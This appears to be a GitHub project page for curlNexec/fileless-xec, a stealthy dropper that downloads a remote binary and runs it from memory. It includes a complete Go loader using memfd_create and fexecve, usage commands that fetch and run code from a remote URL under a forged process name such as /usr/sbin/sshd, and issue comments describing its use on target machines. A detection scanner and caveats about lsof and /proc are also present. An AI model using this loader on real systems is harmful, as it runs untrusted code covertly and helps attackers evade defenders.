Curl & exec a binary file in one step. Also a kind of stealthy dropper.

Overview

curlNexec

👋 Certainly useful, mainly for fun, roughly inspired by a 0x00 article

Short story

curlNexec lets you execute a remote binary on the local machine in one step:

  • simple usage: curlNexec <binary_url>
  • execute the binary under a specified program name: curlNexec -n /usr/sbin/sshd <binary_raw_url>
  • detach program execution from the tty: setsid curlNexec [...]

demo

Explanation: we want to execute the writeNsleep binary, which lives on a remote machine, locally.

We first start a Python HTTP server on the remote machine. Locally we run curlNexec and impersonate the /usr/sbin/sshd name for the execution of the writeNsleep binary (for stealthiness & fun).

Stealthiness story

memfd_create

The downloaded binary is stored locally with the memfd_create syscall, which creates an anonymous file that lives in memory and is referenced only by a file descriptor: it has no entry in the file system (you can't find it with ls), although the descriptor itself is still visible under /proc/<pid>/fd.

fexecve

Then we execute it with fexecve. fexecve is a glibc library function rather than a syscall (glibc builds it on execveat with AT_EMPTY_PATH and falls back to the /proc/self/fd/<fd> path), and since Go's syscall package does not provide it, we implement it ourselves.

With fexecve, we reference the program to run by file descriptor instead of by its full path, so nothing has to exist on disk.
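The two steps above (memfd_create, then execution by descriptor) in one runnable Go program. This is an example written for this page, not curlNexec's own source. It assumes the Linux syscall numbers listed in the code (Go's standard syscall package exports no SYS_MEMFD_CREATE), uses the /proc/self/fd path form of fexecve because Go only wraps execve, and simply passes the forged program name as argv[0]; a hypothetical helper named `die` is used for error exits.

```go
// Added example (not curlNexec's source): download a binary into an anonymous
// memfd and execute it by descriptor, the fileless loader described above.
package main

import (
	"flag"
	"fmt"
	"io"
	"net/http"
	"os"
	"runtime"
	"syscall"
	"unsafe"
)

// Linux memfd_create syscall numbers (assumed here; Go's syscall package
// does not export SYS_MEMFD_CREATE).
var memfdCreateNR = map[string]uintptr{"amd64": 319, "arm64": 279, "386": 356}

const mfdCloexec = 0x1 // MFD_CLOEXEC: the fd is not inherited by the exec'd program

// memfdCreate returns a descriptor for a file that lives only in memory and
// has no directory entry. The kernel labels it "/memfd:<name> (deleted)" in
// /proc/<pid>/fd, /proc/<pid>/exe and /proc/<pid>/maps.
func memfdCreate(name string) (int, error) {
	nr, ok := memfdCreateNR[runtime.GOARCH]
	if !ok {
		return -1, fmt.Errorf("no memfd_create number for %s", runtime.GOARCH)
	}
	cname, err := syscall.BytePtrFromString(name)
	if err != nil {
		return -1, err
	}
	fd, _, errno := syscall.Syscall(nr, uintptr(unsafe.Pointer(cname)), mfdCloexec, 0)
	if errno != 0 {
		return -1, errno
	}
	return int(fd), nil
}

// fdWriter writes with raw syscalls: wrapping the fd in an os.File would let
// its finalizer close the descriptor behind our back before the exec.
type fdWriter int

func (w fdWriter) Write(p []byte) (int, error) { return syscall.Write(int(w), p) }

// loadIntoMemfd stores everything read from r in a fresh memfd labelled name.
func loadIntoMemfd(name string, r io.Reader) (int, error) {
	fd, err := memfdCreate(name)
	if err != nil {
		return -1, err
	}
	if _, err := io.Copy(fdWriter(fd), r); err != nil {
		syscall.Close(fd)
		return -1, err
	}
	return fd, nil
}

// fexecve runs the program behind fd. glibc uses execveat(fd, "", ..., AT_EMPTY_PATH)
// and falls back to the /proc/self/fd path; Go's syscall package only wraps
// execve, so the path form is used here. The kernel opens that path itself,
// so MFD_CLOEXEC on fd does not interfere for an ELF binary.
func fexecve(fd int, argv, envv []string) error {
	return syscall.Exec(fmt.Sprintf("/proc/self/fd/%d", fd), argv, envv)
}

// die is a hypothetical helper for error exits.
func die(what string, err error) { fmt.Fprintln(os.Stderr, what+":", err); os.Exit(1) }

func main() {
	name := flag.String("n", "[kworker/u:0]", "program name to show in ps (argv[0])")
	flag.Parse()
	if flag.NArg() < 1 {
		fmt.Fprintln(os.Stderr, "usage: loader [-n name] <binary_url> [args...]")
		os.Exit(2)
	}
	resp, err := http.Get(flag.Arg(0))
	if err != nil {
		die("download", err)
	}
	if resp.StatusCode != http.StatusOK {
		die("download", fmt.Errorf("%s", resp.Status))
	}
	fd, err := loadIntoMemfd("", resp.Body)
	resp.Body.Close()
	if err != nil {
		die("memfd", err)
	}
	// Exec replaces this process; the lines after it only run on failure.
	argv := append([]string{*name}, flag.Args()[1:]...)
	if err := fexecve(fd, argv, os.Environ()); err != nil {
		die("exec", err)
	}
}
```

Run it as `go run . -n /usr/sbin/sshd http://<remote>:8000/writeNsleep` against a `python3 -m http.server` on the remote side. Because the exec goes through /proc, it needs /proc mounted; a hardened container without it makes the path form fail where execveat would not.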

Other tricks for stealthiness

Although not present on the disk, the running program can still be detected, for example with the ps command.

  1. Cover the tracks with a fake program name: curlNexec --name <fake_name> <binary_raw_url>. By default the name is [kworker/u:0].
  2. Detach from the tty to mimic the behaviour of a daemon process: setsid curlNexec <binary_raw_url>. WIP: call setsid from code.

Caveats

You could still be detected with:

$ lsof | grep memfd

or by reading the /proc/<pid>/exe symlink of a suspicious process: for a program started from a memfd it points to /memfd:<name> (deleted), and /proc/<pid>/maps lists the same target, whatever name the process shows in ps.
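The defender's side of the caveat above, as an added example that is not part of curlNexec: a small Go scanner that walks /proc and reports every process whose main executable is a memfd. It assumes the standard /proc layout (exe, comm, cmdline per PID) and takes the /proc root as a parameter so it can be run against a copied or synthetic tree.

```go
// Added example (not curlNexec's code): list processes executing from a memfd,
// which is how a memfd_create + fexecve loader shows up in /proc even when
// ps displays a forged name.
package main

import (
	"bytes"
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// MemfdHit describes one process whose executable is a memfd.
type MemfdHit struct {
	PID     int
	Exe     string // readlink of /proc/<pid>/exe, e.g. "/memfd:foo (deleted)"
	Comm    string // kernel task name from /proc/<pid>/comm
	Cmdline string // argv as shown by ps; a loader can set this freely
}

// isMemfdTarget reports whether an exe/maps path refers to a memfd-backed
// file. The kernel names these "/memfd:<name>" and appends " (deleted)"
// because the file was never linked into any directory.
func isMemfdTarget(target string) bool {
	return strings.HasPrefix(target, "/memfd:")
}

// readCmdline turns the NUL-separated /proc/<pid>/cmdline into one line.
func readCmdline(path string) string {
	raw, err := os.ReadFile(path)
	if err != nil {
		return ""
	}
	raw = bytes.TrimRight(raw, "\x00")
	return string(bytes.ReplaceAll(raw, []byte{0}, []byte{' '}))
}

// scanProc walks procRoot (normally "/proc") and returns every numeric
// directory whose exe link points at a memfd. Entries that cannot be read
// (kernel threads, other users' processes without CAP_SYS_PTRACE) are skipped,
// so run it as root for full coverage.
func scanProc(procRoot string) ([]MemfdHit, error) {
	entries, err := os.ReadDir(procRoot)
	if err != nil {
		return nil, err
	}
	var hits []MemfdHit
	for _, e := range entries {
		pid, err := strconv.Atoi(e.Name())
		if err != nil || !e.IsDir() {
			continue
		}
		dir := filepath.Join(procRoot, e.Name())
		exe, err := os.Readlink(filepath.Join(dir, "exe"))
		if err != nil || !isMemfdTarget(exe) {
			continue
		}
		comm, _ := os.ReadFile(filepath.Join(dir, "comm"))
		hits = append(hits, MemfdHit{
			PID:     pid,
			Exe:     exe,
			Comm:    strings.TrimSpace(string(comm)),
			Cmdline: readCmdline(filepath.Join(dir, "cmdline")),
		})
	}
	return hits, nil
}

func main() {
	root := "/proc"
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	hits, err := scanProc(root)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, h := range hits {
		fmt.Printf("pid=%d exe=%q comm=%q cmdline=%q\n", h.PID, h.Exe, h.Comm, h.Cmdline)
	}
}
```

Only the exe link is checked on purpose: many legitimate programs (compositors, browsers, systemd) map memfds for shared memory, so matching on /proc/<pid>/maps or open descriptors alone produces noise; a process whose main image is a memfd is a much stronger signal.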
Comments
  • Feature: support for Windows & systems w/o memfd_create syscall

    Although fileless-xec is made for stealthiness, which mainly stands on the memfd_create syscall (making it fileless), it could be interesting to have an option to store the binary file locally before executing it.

    This will make fileless-xec useful for:

    • Target machine which is a Windows one
    • Target machine without the memfd_create syscall
    • Other cases where fileless functionality is not needed
    enhancement 
    opened by ariary 0
  • Feature: fileless-xec in server mode (wait on target machine)

    fileless-xec is used on the target machine to execute a binary file hosted on an attacker-controlled machine.

    Currently, the attacker machine runs a server which hosts the binary file; fileless-xec requests it, then executes it.

    An interesting feature could be to have another type of interaction between target and attacker machine: the target machine would run a server (binary upload server) and the attacker machine would send the binary (through http, http3, ...) to that server. Once the binary file is received, the target machine executes it as usual.

    enhancement 
    opened by ariary 0
Releases(v3.2.1)
Owner
Ariary
Security Engineer naively hoping that his technical background will one day be more effective than social engineering